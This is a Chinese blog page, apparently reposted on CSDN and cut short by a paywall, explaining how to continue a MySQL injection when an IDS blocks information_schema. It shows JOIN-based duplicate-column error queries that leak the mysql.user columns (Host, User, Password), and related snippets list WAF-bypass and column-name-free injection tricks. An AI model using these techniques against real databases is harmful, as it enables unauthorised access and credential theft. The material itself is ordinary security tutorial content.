mysql 注入 information_schema_绕过IDS过滤information_schema继续注入

最新推荐文章于 2023-10-09 12:54:15 发布
最新推荐文章于 2023-10-09 12:54:15 发布
阅读量1.1k 收藏 1
点赞数
文章标签: mysql 注入 information_schema
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35867608/article/details/113937118
版权
本文介绍了如何在IDS过滤了information_schema的情况下,通过MySQL的错误信息进行数据库注入,包括利用NAME_CONST函数的特性尝试绕过过滤,并在不同版本的MySQL中测试这些方法,展示了如何暴露出数据库的列名和字段值。
摘要由CSDN通过智能技术生成

原文:绕过IDS过滤information_schema继续注入

//利用MySQL出错爆出字段

mysql> SELECT * FROM (SELECT * FROM user A JOIN user B) C;

ERROR 1060 (42S21): Duplicate column name 'Host'

mysql> SELECT * FROM (SELECT * FROM user A JOIN user B USING (Host)) C;

ERROR 1060 (42S21): Duplicate column name 'User'

mysql> SELECT * FROM (SELECT * FROM user A JOIN user B USING (Host,User)) C;

ERROR 1060 (42S21): Duplicate column name 'Password'

.....

//得到信息

//可能是版本问题,我测试没能成功

mysql> SELECT NAME_CONST((SELECT Host FROM user LIMIT 0,1),0);

ERROR 1210 (HY000): Incorrect arguments to NAME_CONST

好像是NAME_CONST的参数必须为CONST还是怎么了,悲剧。

下次再好好测试一下。

Update:确实是版本的问题(高版本要求参数全为const,否则报错),这方法的通用性看来不是很好。

mysql> SELECT version();

+---------------------+

| version()           |

最低0.47元/天 解锁文章
宇文数学
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
information_schema过滤与无列名注入
snowlyzz的博客
09-06 1268
information_schema过滤与无列名注入
关于MySQL绕过授予information_schema中对象时报ERROR 1044(4200)错误
12-14
这个问题是微信群中网友关于MySQL权限的讨论,有这么一个业务需求(下面是他的原话): 因为MySQL的很多功能都依赖主键,我想用zabbix用户,来监控业务数据库的所有表,是否都建立了主键。 监控的语句是: FROM information_schema.tables t1 LEFT OUTER JOIN information_schema.table_constraints t2 ON t1.table_schema = t2.table_schema AND t1.table_name = t2.table_name
Bypass information_schema
mi900709的博客
12-02 650
Bypass information_schema 前言 聊一聊mysql在被waf禁掉了information_schema库后还能有哪些利用思路,这个想法是前一段时间想到的,这次趁着安全客活动就在这里记录一下吧~ 实验环境 windows 2008 r2 phpstudy (mysql 5.7) 某waf(原因是该waf可以设置非法访问information_schema数据库) 前置任务 进行bypass之前先了解一下mysql中的information_schma这个库是干嘛的,在SQ
mysql注入绕过information_schema过滤
b1ackc4t的博客
10-19 5712
1.利用mysql5.7新增的sys.schema_auto_increment_columns 这是sys数据库下的一个视图,基础数据来自与information_schema,他的作用是对表的自增ID进行监控,也就是说,如果某张表存在自增ID,就可以通过该视图来获取其表名和所在数据库名 以下为该视图的所有列 2.sys.schema_table_statistics_with_buffer 这是sys数据库下的视图,里面存储着所有数据库所有表的统计信息 ...
Bypass information_schema与无列名注入
qq_45521281的博客
06-09 3399
文章目录Bypass information_schema前言前置任务MySQL5.7的新特性sys.schema_auto_increment_columnsschema_table_statistics_with_buffer、x$schema_table_statistics_with_buffer无列名注入利用joinjoin … using(xx)利用普通子查询[SWPU2019]Web1——无列名注入 Bypass information_schema 前言 聊一聊mysql在被waf禁掉了in
WEB—无列名注入过滤information_schema
sGanYu
11-09 2714
一开始由于注册admin的时候,告知用户已被注册,以为需要爆破admin密码,失败后尝试万能密码,发现也不行。。。注册新用户后又对广告的xss研究半天,虽然怀疑过SQL,后来没想到真的是SQL注入 知识点 无列名注入 过滤information_schema 随便注册一个账户登录,进去后可以发布广告【千万不要写入一个xss,弹来弹去,盲猜你们会尝试】 发布一个广告名为:1',内容随意 点击广告详情,弹出关键报错信息,数据库为MariaDB 继续注入,发布一个广告名为:.
解析MySQLinformation_schema数据库
09-10
USER_PRIVILEGES表、SCHEMA_PRIVILEGES表、TABLE_PRIVILEGES表和COLUMN_PRIVILEGES表都是关于权限信息的,分别反映了全局权限、数据库权限、表权限和列权限。这些信息来源于MySQL的权限系统,如mysql.user、mysql.db...
mysql数据库中的information_schemamysql可以删除吗?
09-10
MySQL中,有若干内置的系统数据库,其中两个最为关键的数据库是`information_schema`和`mysql`。这些数据库虽然看似普通,但它们对于MySQL的正常运行至关重要,因此在任何情况下都不应该被删除。 `information_...
information_schema数据库在SQL注入中的应用.docx
06-11
Schemata 表提供了当前 MySQL 数据库中所有数据库的信息,其中 SCHEMA_NAME 字段保存了所有的数据库名。“show databases;”命令的结果即取自此表。通过查询 Schemata 表,可以获取到所有数据库的名称,例如,执行...
聊一聊bypass information_schema
zhangge3663的博客
05-10 256
前言 聊一聊mysql在被waf禁掉了information_schema库后还能有哪些利用思路,这个想法是前一段时间想到的,这次趁着安全客活动就在这里记录一下吧~ # 实验环境 windows 2008 r2 phpstudy (mysql 5.7) 某waf(原因是该waf可以设置非法访问information_schema数据库) 前置任务 进行bypass之前先了解一下mysql中的information_schma这个库是干嘛的,在SQL注入中它的作用是什么,那么有没有可以替代这个库
BUUCTF:[GYCTF2020]Ezsqli --过滤information_schem ------ 无列明注入过滤了union 使用ascii偏移来做
Zero_Adam的博客
03-15 1349
一、自己做: 直截了当的sql注入,先用fuzz字典跑一下: information_schema.table等被过滤了, 而且union 也被过了, 尝试了 || 和&& 等没有过滤,并且strsub,limit等都没有过滤,初步判断盲注应该时可以的。 但是 information_chema等被过滤了,表和 列都查不出来, 二、学到的&&不足: 当information_schema等被过滤的时候,能够查出数据库的名字,但是表明不知道,这时可以用这个来sys.schem
Mysql元数据获取方法(information_schema绕过方法)
Thunderclap的博客
02-16 1205
information_schema绕过方法总结
[GYCTF2020]Ezsqli 绕过or information_schema 无列名注入
m0_64180167的博客
10-09 456
说好的ez....我们开始吧首先就直接进行抓包 看回显然后开始正常的测试报错了 这里的。
mysql information_schema 注入_mysql手工注入的详细解析和information_schema表的作用
weixin_33735281的博客
02-06 120
据库名称;TABLE_NAME表示表的名称| COLUMNS ----―&gt存储字段名| 关键字段:TABLE_SCHEMA表示表所属的数据库名称;TABLE_NAME表示所属的表的名称COLUMN_NAME表示字段名===========================================================...
MySql注入科普
huike008的博客
06-01 161
默认存在的数据库: mysql 需要root权限读取 information_schema 在5以上的版本中存在 测试是否存在注入方法 假:表示查询是错误的 (MySQL 报错/返回页面与原来不同) 真:表示查询是正常的 (返回页面与原来相同) 共三种情况: 字符串类型查询时: 数字类型查询时: 登陆时: ‘ 假 ” 真 “ 假 “” 真...
SQL注入测试技巧TIP:再从Mysql注入绕过过滤说起
凡宇
07-15 283
对于mysql注入,基本上是每一名web安全从业者入门的基本功,这里不多废话,结合本人无聊时在mysql上的测试,来谈一谈mysql过滤某些特殊字符情况下的注入,因为是想到哪写到哪,文章比较散,各位大佬请绕过,和我一样的小白可以看一看,温故而知新,必有所获。 php查询mysql的后台脚本就不搭了,没有多大意义,直接从mysql控制台开始测试。首先从最简单的开始: 直接使用mysql系统库...
INFORMATION_SCHEMA InnoDB 表
dbtrd733355的博客
08-20 187
INFORMATION_SCHEMA InnoDB Tables 本节提供InnoDB INFORMATION_SCHEMA表的表定义。 有关相关信息和示例,请参见“InnoDB INFORMATION_SCHEMA表”。 InnoDB INFORMATION_SCHEMA表可用于监控正在进行的InnoDB活动,在问题发生之前检测低效率,或解决性能和...
information_schema注入
北冥有鱼
03-30 4958
上一篇文章提到过,information_schemamysql自带的一个表,这个表里存放了大量信息。 我们可以进去这个数据库简单的看一下 然后输入 show tables, 能看到这里面有很多的表,我们先来看一下tables这个表 可以发现这里面有很多的字段,这些字段包含了这个数据库的名称,这个数据库里的表的名称,表的类型,默认的引擎,版本等等。。这些东西,都会放到这个表里面 还有一...
Mysql注入绕过WAF总结
b1ackc4t的博客
01-24 2689
Mysql注入绕过WAF总结 过滤等于号 select * from user where id = 2; select * from user where id like 2; select * from user where id rlike 2; select * from user where id regexp 2; select * from user where id > 1 and id < 3; select * from user where !id <> 2;
information_schema | | mysql | | performance_schema
最新发布
01-10
information_schemaMySQL数据库中的一个系统数据库,它包含了关于数据库、表、列、索引、用户权限等信息的元数据。mysql和performance_schemainformation_schema中的两个表。 mysql表包含了MySQL服务器的用户...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值